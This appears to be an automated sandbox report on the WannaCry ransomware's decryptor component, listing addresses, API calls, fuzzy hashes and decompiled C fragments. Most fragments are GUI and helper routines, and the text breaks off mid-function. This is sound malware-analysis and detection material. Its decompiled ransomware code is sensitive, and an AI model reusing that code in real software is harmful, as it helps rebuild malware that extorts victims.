0x00403c01
0x00000000
0x00000000
0x00000000
0x00403c01
0x00403bee
0x00403c55
0x00403c55
0x00403c59
0x00000000
0x00000000
0x00000000
0x00403c59
0x00403c60
0x00403c62
0x00403c71
0x00403c73
0x00403c73
0x00403c7f
0x00403c8a
0x00403c9a
0x00403ca7
0x00403b6b
0x00403b72
0x00403b7d
0x00403b83
0x00403b8d
0x00403b9a
0x00403b9a
0x00403b28
0x00403b33
0x00403b40
0x00403b40

APIs

fopen.MSVCRT ref: 00403B17

Strings

f.wnry, xrefs: 00403B12

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: fopen
String ID: f.wnry
API String ID: 1432627528-2448388194
Opcode ID: cf48eaa19fa84c87f31c2d63a6b3fa47abbd49c5c0666401f46844b5b3827a14
Instruction ID: 4eb239c0cb280e6f7c3b00bdc2b89ffa7a6027cf1f229c631d6900f059da94bf
Opcode Fuzzy Hash: cf48eaa19fa84c87f31c2d63a6b3fa47abbd49c5c0666401f46844b5b3827a14
Instruction Fuzzy Hash: CF410B311087415BE324DF3899417ABBBD4FB80321F144A3EF4E6B22C1DF789A088796

Uniqueness

Uniqueness Score: -1.00%

Function 0040D150 Relevance: 6.1, APIs: 4, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040D150(int __eax, intOrPtr* __ecx, void* __edi, char _a4, char _a8, char _a12, intOrPtr* _a16) {
				char _v500;
				intOrPtr _v508;
				char _v520;
				char _v521;
				char _v528;
				char _v529;
				intOrPtr _v536;
				signed int _t42;
				short _t46;
				signed int _t48;
				int _t62;
				intOrPtr* _t63;
				intOrPtr _t67;
				intOrPtr _t81;
				void* _t82;
				void* _t83;
				void* _t89;
				void* _t94;
				intOrPtr* _t95;
				void* _t97;
				void* _t99;

				_t89 = __edi;
				_t63 = __ecx;
				_push(0);
				L0041303E();
				srand(__eax);
				_t99 =  &_v508 + 8;
				_t42 = rand();
				asm("cdq");
				_t94 = 0;
				_t81 = _t42 % 0xc8 + 0x1f;
				_v508 = _t81;
				if(_t81 > 0) {
					do {
						_t62 = rand();
						_t81 = _v508;
						 *(_t99 + _t94 + 0x14) = _t62;
						_t94 = _t94 + 1;
					} while (_t94 < _t81);
				}
				_t95 = _a16;
				_t97 = _t99 + _t81 - 0xb;
				if(_t95 != 0) {
					_push(_t89);
					memcpy(_t97, E0040D5C0(_t95), 7 << 2);
					_t99 = _t99 + 0xc;
					asm("movsw");
					asm("movsb");
					_t81 = _v508;
					_t95 = _a16;
				}
				 *((char*)(_t99 + _t81 + 0x14)) = _a4;
				_t82 = _t81 + 1;
				 *((char*)(_t99 + _t82 + 0x1c)) = _a8;
				_t83 = _t82 + 1;
				 *((char*)(_t99 + _t83 + 0x1c)) = _a12;
				_v508 = _t83 + 1;
				_t46 = E00412B00(_t97, 0x1f);
				_t67 = _v508;
				 *((short*)(_t99 + 8 + _t67 + 0x14)) = _t46;
				_t48 =  *((intOrPtr*)( *_t63 + 0x18))(2,  &_v500, _t67 + 2, 0);
				if(_t48 < 0) {
					L12:
					return _t48 | 0xffffffff;
				} else {
					E0040D5A0(_t63, _t97);
					_push( &_v528);
					_push( &_v520);
					_push( &_v521);
					_v528 = 0x1f4;
					if( *((intOrPtr*)( *_t63 + 0x1c))() < 0 || _v529 != 2) {
						_t48 =  *((intOrPtr*)( *_t63 + 0xc))();
						goto L12;
					} else {
						if(_t95 == 0) {
							L10:
							return 0;
						} else {
							_push(1);
							_push(_v536);
							_push( &_v528);
							_push(2);
							if( *((intOrPtr*)( *_t95 + 0x18))() == 0) {
								goto L10;
							} else {
								return  *((intOrPtr*)( *_t63 + 0xc))() | 0xffffffff;
							}
						}
					}
				}
			}

0x0040d150
0x0040d159
0x0040d15b
0x0040d15d
0x0040d163
0x0040d168
0x0040d16b
0x0040d170
0x0040d176
0x0040d17a
0x0040d17f
0x0040d183
0x0040d185
0x0040d185
0x0040d18a
0x0040d18e
0x0040d192
0x0040d193
0x0040d185
0x0040d197
0x0040d19e
0x0040d1a4
0x0040d1a6
0x0040d1b7
0x0040d1b7
0x0040d1b9
0x0040d1bb
0x0040d1bc
0x0040d1c0
0x0040d1c7
0x0040d1d6
0x0040d1e1
0x0040d1e5
0x0040d1e9
0x0040d1ea
0x0040d1ef
0x0040d1f3
0x0040d1f8
0x0040d201
0x0040d215
0x0040d21a
0x0040d297
0x0040d2a1
0x0040d21c
0x0040d21f
0x0040d22a
0x0040d233
0x0040d234
0x0040d237
0x0040d244
0x0040d292
0x00000000
0x0040d24d
0x0040d24f
0x0040d282
0x0040d28b
0x0040d251
0x0040d257
0x0040d25d
0x0040d25e
0x0040d25f
0x0040d268
0x00000000
0x0040d26a
0x0040d27d
0x0040d27d
0x0040d268
0x0040d24f
0x0040d244

APIs

time.MSVCRT ref: 0040D15D
srand.MSVCRT ref: 0040D163
rand.MSVCRT ref: 0040D16B
rand.MSVCRT ref: 0040D185

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: rand$srandtime
String ID:
API String ID: 1946231456-0
Opcode ID: aeda45b4266ec6acd211240a262b9f529a391165e32c1a7dc214254ed02393b1
Instruction ID: 99a3411600cb7ade80f66248b35b99165d2bae15bbb14ca3cd699ef114e4807e
Opcode Fuzzy Hash: aeda45b4266ec6acd211240a262b9f529a391165e32c1a7dc214254ed02393b1
Instruction Fuzzy Hash: 6E411231A083454BD314DE69D885BABFBD4AFD4710F04893EE885973C2DA78D94987E3

Uniqueness

Uniqueness Score: -1.00%

Function 00406A00 Relevance: 6.1, APIs: 4, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00406A00(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12) {
				void* _t15;
				signed int _t23;
				intOrPtr* _t33;
				void* _t34;

				_t23 = _a12;
				_t33 = _a4;
				_push(_t23);
				_push(_a8);
				_t34 = __ecx;
				_push(_t33);
				L00412D6A();
				if(_t23 > 6) {
					L12:
					return _t15;
				} else {
					switch( *((intOrPtr*)(_t23 * 4 +  &M00406ABC))) {
						case 0:
							_push( *((intOrPtr*)(__ecx + 0x824)));
							_t17 =  *((intOrPtr*)( *_t33 + 0x34))();
							L00412D64();
							if(_t17 == 0x402) {
								L6:
								_push(0xe0e0);
								 *((intOrPtr*)( *_t33 + 0x38))();
							} else {
								L00412D64();
								if(_t17 == 0x3fe) {
									goto L6;
								} else {
									L00412D64();
									if(_t17 == 0x3fb) {
										goto L6;
									} else {
										_push(0xffffff);
										 *((intOrPtr*)( *_t33 + 0x38))();
									}
								}
							}
							_t35 =  *((intOrPtr*)(_t34 + 0x828));
							if(_t35 != 0) {
								goto L11;
							}
							return 0;
							goto L13;
						case 1:
							goto L12;
						case 2:
							_push( *((intOrPtr*)(__esi + 0x824)));
							__ecx = __edi;
							 *((intOrPtr*)( *__edi + 0x34))();
							if(__esi != 0) {
								L11:
								return  *((intOrPtr*)(_t35 + 4));
							}
							return 0;
							goto L13;
					}
				}
				L13:
			}

0x00406a01
0x00406a0c
0x00406a10
0x00406a11
0x00406a12
0x00406a14
0x00406a15
0x00406a1d
0x00406ab7
0x00406ab7
0x00406a23
0x00406a23
0x00000000
0x00406a32
0x00406a35
0x00406a3a
0x00406a44
0x00406a70
0x00406a72
0x00406a79
0x00406a46
0x00406a48
0x00406a52
0x00000000
0x00406a54
0x00406a56
0x00406a60
0x00000000
0x00406a62
0x00406a64
0x00406a6b
0x00406a6b
0x00406a60
0x00406a52
0x00406a7c
0x00406a84
0x00000000
0x00000000
0x00406a8c
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a97
0x00406a98
0x00406a9a
0x00406aa5
0x00406ab0
0x00000000
0x00406ab0
0x00406aad
0x00000000
0x00000000
0x00406a23
0x00000000

APIs

#4476.MFC42(?,?,?), ref: 00406A15
#3089.MFC42 ref: 00406A3A
#3089.MFC42 ref: 00406A48
#3089.MFC42 ref: 00406A56

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #3089$#4476
String ID:
API String ID: 2870283385-0
Opcode ID: 53d97fe879bd1ae3a70958cbaed72806608eb4448782c61a221ab90d014d582e
Instruction ID: 793279239b1821bde48ff71d8c5d322d7df26b5d288dea54ba4f6719e02562de
Opcode Fuzzy Hash: 53d97fe879bd1ae3a70958cbaed72806608eb4448782c61a221ab90d014d582e
Instruction Fuzzy Hash: D91181323012018BC624EA59D584D7FB3A9EF89321B15842FE947E7391CB39ACA19B95

Uniqueness

Uniqueness Score: -1.00%

Function 0040D0A0 Relevance: 6.1, APIs: 4, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040D0A0(int __eax, intOrPtr* __ecx, char _a4, char _a8) {
				char _v500;
				signed int _t22;
				signed int _t27;
				intOrPtr* _t32;
				void* _t40;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t49;

				_t32 = __ecx;
				_push(0);
				L0041303E();
				srand(__eax);
				_t49 =  &_v500 + 8;
				_t22 = rand();
				asm("cdq");
				_t40 = 0;
				_t43 = _t22 % 0xc8 + 0x1f;
				if(_t43 <= 0) {
					L2:
					_t41 = _t49 + _t43 - 0x13;
					 *((char*)(_t49 + _t43 + 0xc)) = _a4;
					_t44 = _t43 + 1;
					 *((char*)(_t49 + _t44 + 0x14)) = 0;
					_t45 = _t44 + 1;
					 *((char*)(_t49 + _t45 + 0x14)) = _a8;
					_t46 = _t45 + 1;
					 *((short*)(_t49 + 8 + _t46 + 0xc)) = E00412B00(_t49 + _t43 - 0x13, 0x1f);
					_t27 =  *((intOrPtr*)( *_t32 + 0x18))(2,  &_v500, _t46 + 2, 0);
					if(_t27 >= 0) {
						E0040D5A0(_t32, _t41);
						return 0;
					} else {
						return _t27 | 0xffffffff;
					}
				} else {
					goto L1;
				}
				do {
					L1:
					 *((char*)(_t49 + _t40 + 0xc)) = rand();
					_t40 = _t40 + 1;
				} while (_t40 < _t43);
				goto L2;
			}

0x0040d0a9
0x0040d0ab
0x0040d0ad
0x0040d0b3
0x0040d0b8
0x0040d0bb
0x0040d0c0
0x0040d0c6
0x0040d0cc
0x0040d0d1
0x0040d0e1
0x0040d0ef
0x0040d0f3
0x0040d0f7
0x0040d0fb
0x0040d100
0x0040d101
0x0040d105
0x0040d110
0x0040d124
0x0040d129
0x0040d13d
0x0040d14d
0x0040d12d
0x0040d137
0x0040d137
0x00000000
0x00000000
0x00000000
0x0040d0d3
0x0040d0d3
0x0040d0d8
0x0040d0dc
0x0040d0dd
0x00000000

APIs

time.MSVCRT ref: 0040D0AD
srand.MSVCRT ref: 0040D0B3
rand.MSVCRT ref: 0040D0BB
rand.MSVCRT ref: 0040D0D3

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: rand$srandtime
String ID:
API String ID: 1946231456-0
Opcode ID: bbdcb1e1a24d480e02c6f3989001f72fd3822a1270c55b374a5c1adf4e9cf230
Instruction ID: 418ba94e1263f5c278544cd72932f8c5cb06cad23ebf9749a5f73f3a0ac0752c
Opcode Fuzzy Hash: bbdcb1e1a24d480e02c6f3989001f72fd3822a1270c55b374a5c1adf4e9cf230
Instruction Fuzzy Hash: CB113D3164935106D3207A2A6C02BAFAB949FE1728F04493FE9D9962C2C46C894E83F7

Uniqueness

Uniqueness Score: -1.00%

Function 00405180 Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00405180(void* __ecx, intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t19;
				void* _t26;

				_t19 = _a4;
				_t26 = __ecx;
				_t10 =  *((intOrPtr*)(__ecx + 0x44));
				__imp___mbscmp(_t10, _t19);
				if(_t10 == 0) {
					return _t10;
				} else {
					_push(_t19);
					L00412DA0();
					 *((char*)(__ecx + 0x48)) = 1;
					if( *((intOrPtr*)(__ecx + 0x74)) == 0) {
						E00405800(__ecx, 0);
					}
					if( *((intOrPtr*)(_t26 + 0x70)) == 0) {
						E00405820(_t26, 0);
					}
					if( *((intOrPtr*)(_t26 + 0x49)) == 0) {
						return InvalidateRect( *(_t26 + 0x20), 0, 1);
					}
					return RedrawWindow( *(_t26 + 0x20), 0, 0, 0x121);
				}
			}

0x00405181
0x00405186
0x0040518a
0x00405191
0x0040519c
0x004051fb
0x0040519e
0x0040519e
0x004051a1
0x004051a9
0x004051af
0x004051b5
0x004051b5
0x004051bf
0x004051c5
0x004051c5
0x004051cf
0x00000000
0x004051f2
0x004051e7
0x004051e7

APIs

_mbscmp.MSVCRT ref: 00405191
#860.MFC42(?), ref: 004051A1
RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE
InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #860InvalidateRectRedrawWindow_mbscmp
String ID:
API String ID: 497622568-0
Opcode ID: 4aae586b1cfc2d6b37c47d983e66569639a31ec6a673fed4d94bf49cd6230326
Instruction ID: cf498a414c54833703d22adddad9dcc08bc55e2fe29af9a848031684a7c2f2b5
Opcode Fuzzy Hash: 4aae586b1cfc2d6b37c47d983e66569639a31ec6a673fed4d94bf49cd6230326
Instruction Fuzzy Hash: 7B01D871700B00A7D6209765DC59FDBB7E9EF98702F00442EF746EB2C0C675E4018B68

Uniqueness

Uniqueness Score: -1.00%

Function 00404430 Relevance: 6.0, APIs: 4, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00404430(intOrPtr __ecx, char _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _t13;
				struct HICON__* _t16;
				struct HICON__* _t17;
				intOrPtr _t26;

				_t26 = __ecx;
				_t13 =  *((intOrPtr*)(__ecx + 0x59));
				if(_t13 != 0) {
					if( *((intOrPtr*)(__ecx + 0x5a)) == 0) {
						E00404530(__ecx);
					}
					if(E004045E0(_t26,  &_a8) == 0) {
						_t16 =  *(_t26 + 0x60);
					} else {
						_t16 =  *(_t26 + 0x5c);
					}
					_t17 = SetCursor(_t16);
					L00412CBC();
					return _t17;
				} else {
					_v16 = 0x10;
					if(__ecx != 0) {
						_t13 =  *((intOrPtr*)(__ecx + 0x20));
						_v8 = _t13;
					} else {
						_v8 = __ecx;
					}
					_v12 = 2;
					__imp___TrackMouseEvent( &_v16);
					 *((char*)(_t26 + 0x59)) = 1;
					L00412CBC();
					return _t13;
				}
			}

0x00404434
0x00404436
0x0040443b
0x00404480
0x00404484
0x00404484
0x00404497
0x0040449e
0x00404499
0x00404499
0x00404499
0x004044a2
0x004044aa
0x004044b3
0x0040443d
0x0040443f
0x00404447
0x0040444f
0x00404452
0x00404449
0x00404449
0x00404449
0x0040445a
0x00404463
0x0040446b
0x0040446f
0x00404478
0x00404478

APIs

_TrackMouseEvent.COMCTL32(00000010), ref: 00404463
#2379.MFC42 ref: 0040446F
SetCursor.USER32(?,?), ref: 004044A2
#2379.MFC42 ref: 004044AA

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #2379$CursorEventMouseTrack
String ID:
API String ID: 2186836335-0
Opcode ID: 8cae4badaefa13b91853eadf55a8840a780c3bb417d72a3b214d508dff938200
Instruction ID: d4ee5e4a134dc88e0fb0520758ee2c50d42c0b6297011b3ab606eb820e3435c7
Opcode Fuzzy Hash: 8cae4badaefa13b91853eadf55a8840a780c3bb417d72a3b214d508dff938200
Instruction Fuzzy Hash: 1501B5B46047209BC714EF1895047EFBBD46FC4718F40881EEAC557382E6B898058B99

Uniqueness

Uniqueness Score: -1.00%

Function 00404CF0 Relevance: 6.0, APIs: 4, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00404CF0(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t13;
				intOrPtr* _t21;
				intOrPtr* _t22;
				intOrPtr _t27;

				_push(0xffffffff);
				_push(E0041384E);
				_t13 =  *[fs:0x0];
				_push(_t13);
				 *[fs:0x0] = _t27;
				_v20 = __ecx;
				_v4 = 0;
				_t21 = __ecx + 0x70;
				_v16 = _t21;
				 *_t21 = 0x415c00;
				_v4 = 3;
				L00412D52();
				 *_t21 = 0x415bec;
				_t22 = __ecx + 0x64;
				_v16 = _t22;
				 *_t22 = 0x415c00;
				_v4 = 4;
				L00412D52();
				 *_t22 = 0x415bec;
				_v4 = 0;
				L00412CC2();
				_v4 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v12;
				return _t13;
			}

0x00404cf0
0x00404cf2
0x00404cf7
0x00404cfd
0x00404cfe
0x00404d0c
0x00404d10
0x00404d18
0x00404d1b
0x00404d1f
0x00404d27
0x00404d2c
0x00404d31
0x00404d37
0x00404d3a
0x00404d3e
0x00404d46
0x00404d4b
0x00404d53
0x00404d59
0x00404d5e
0x00404d65
0x00404d6d
0x00404d78
0x00404d82

APIs

#2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D2C
#2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D4B
#800.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D5E
#641.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D6D

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #2414$#641#800
String ID:
API String ID: 2580907805-0
Opcode ID: 16959137cf9ed8865fc6a78509c90b23480716c09409454935714356ef62aba6
Instruction ID: 6757f658c1b9d10fae8a918e1fd1a20a9830f850e3759812b0851a74ca26fea9
Opcode Fuzzy Hash: 16959137cf9ed8865fc6a78509c90b23480716c09409454935714356ef62aba6
Instruction Fuzzy Hash: F3012975508B42CBC300DF19C54538AFBE8BBE4710F54491EE095877A1D7F851998BD6

Uniqueness

Uniqueness Score: -1.00%

Function 00404170 Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00404170(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t12;
				intOrPtr* _t20;
				intOrPtr _t25;

				_push(0xffffffff);
				_push(E00413776);
				_t12 =  *[fs:0x0];
				_push(_t12);
				 *[fs:0x0] = _t25;
				_v20 = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x415cb0;
				_v4 = 0;
				_t20 = __ecx + 0x48;
				_v16 = _t20;
				 *_t20 = 0x415c00;
				_v4 = 3;
				L00412D52();
				 *_t20 = 0x415bec;
				_v4 = 1;
				L00412CC2();
				_v4 = 0;
				L00412CC2();
				_v4 = 0xffffffff;
				L00412D94();
				 *[fs:0x0] = _v12;
				return _t12;
			}

0x00404170
0x00404172
0x00404177
0x0040417d
0x0040417e
0x0040418c
0x00404190
0x00404196
0x0040419e
0x004041a1
0x004041a5
0x004041ad
0x004041b2
0x004041ba
0x004041c0
0x004041c5
0x004041cd
0x004041d2
0x004041d9
0x004041e1
0x004041ec
0x004041f6

APIs

#2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
#800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
#800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
#795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #800$#2414#795
String ID:
API String ID: 932896513-0
Opcode ID: de7d764f310d2b07daedf415afe273c0a0adcf5a3115b404c86b6cccc177a748
Instruction ID: 4f5e1f32c4d0deb5ef0c4e05178b03e64e757a210687b4ed5005f9af419c08f7
Opcode Fuzzy Hash: de7d764f310d2b07daedf415afe273c0a0adcf5a3115b404c86b6cccc177a748
Instruction Fuzzy Hash: A3018F74108792CFC300DF19C14138AFFE4ABA4720F54491EE091833A2D7F85198CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 00402E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00402E00(void* __ecx, void* _a4, intOrPtr* _a8, char _a12) {
				intOrPtr* _t18;
				intOrPtr* _t22;
				intOrPtr _t23;
				intOrPtr _t30;
				intOrPtr* _t35;
				intOrPtr* _t37;
				void* _t40;

				_t1 =  &_a12; // 0x40276a
				_t35 = _a8;
				if(_t35 ==  *_t1) {
					_t16 =  &_a4; // 0x40276a
					_t18 =  *_t16;
					 *_t18 = _t35;
					return _t18;
				} else {
					do {
						_t37 = _t35;
						_t35 =  *_t35;
						 *((intOrPtr*)( *((intOrPtr*)(_t37 + 4)))) =  *_t37;
						 *((intOrPtr*)( *_t37 + 4)) =  *((intOrPtr*)(_t37 + 4));
						_t30 =  *((intOrPtr*)(_t37 + 0xc));
						if(_t30 != 0) {
							_t23 =  *((intOrPtr*)(_t30 - 1));
							if(_t23 == 0 || _t23 == 0xff) {
								_push(_t30 + 0xfffffffe);
								L00412C98();
								_t40 = _t40 + 4;
							} else {
								 *((char*)(_t30 - 1)) = _t23 - 1;
							}
						}
						_push(_t37);
						 *((intOrPtr*)(_t37 + 0xc)) = 0;
						 *((intOrPtr*)(_t37 + 0x10)) = 0;
						 *((intOrPtr*)(_t37 + 0x14)) = 0;
						L00412C98();
						_t40 = _t40 + 4;
						_a8 = _a8 - 1;
					} while (_t35 != _a12);
					_t22 = _a4;
					 *_t22 = _t35;
					return _t22;
				}
			}

0x00402e00
0x00402e06
0x00402e0e
0x00402e7a
0x00402e7a
0x00402e7e
0x00402e82
0x00402e10
0x00402e14
0x00402e14
0x00402e16
0x00402e1d
0x00402e24
0x00402e27
0x00402e2c
0x00402e2e
0x00402e33
0x00402e43
0x00402e44
0x00402e49
0x00402e39
0x00402e3b
0x00402e3b
0x00402e33
0x00402e4c
0x00402e4d
0x00402e50
0x00402e53
0x00402e56
0x00402e62
0x00402e68
0x00402e68
0x00402e6d
0x00402e73
0x00402e77
0x00402e77

APIs

#825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E44
#825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E56

Strings

j'@, xrefs: 00402E00, 00402E7A

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #825
String ID: j'@
API String ID: 41483190-370697233
Opcode ID: 4b7a11e06f7b77b6c3f3455a4fa83ed2b0c26ddd3550b5a3317a6a2ed897b25e
Instruction ID: 592289367714aa5b9ee555d1ba3af08658367c911d5aba0fbb12e5c1e921281d
Opcode Fuzzy Hash: 4b7a11e06f7b77b6c3f3455a4fa83ed2b0c26ddd3550b5a3317a6a2ed897b25e
Instruction Fuzzy Hash: 771185B62046008FC724CF19D18096BFBE6FF99320714893EE29A97380D376EC05CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00407650 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407650(void* __ecx, intOrPtr _a4) {
				intOrPtr _t3;
				void* _t4;

				_t3 = _a4;
				if(_t3 != 0x3e9) {
					if(_t3 == 0x3ea) {
						_t3 =  *((intOrPtr*)(__ecx + 0x820));
						if(_t3 == 0) {
							_t3 = E0040B620(L"Wana Decrypt0r 2.0", 0);
						}
					}
					L00412CBC();
					return _t3;
				} else {
					_t4 = E004076A0(__ecx, 1);
					L00412CBC();
					return _t4;
				}
			}

0x00407650
0x0040765c
0x00407675
0x00407677
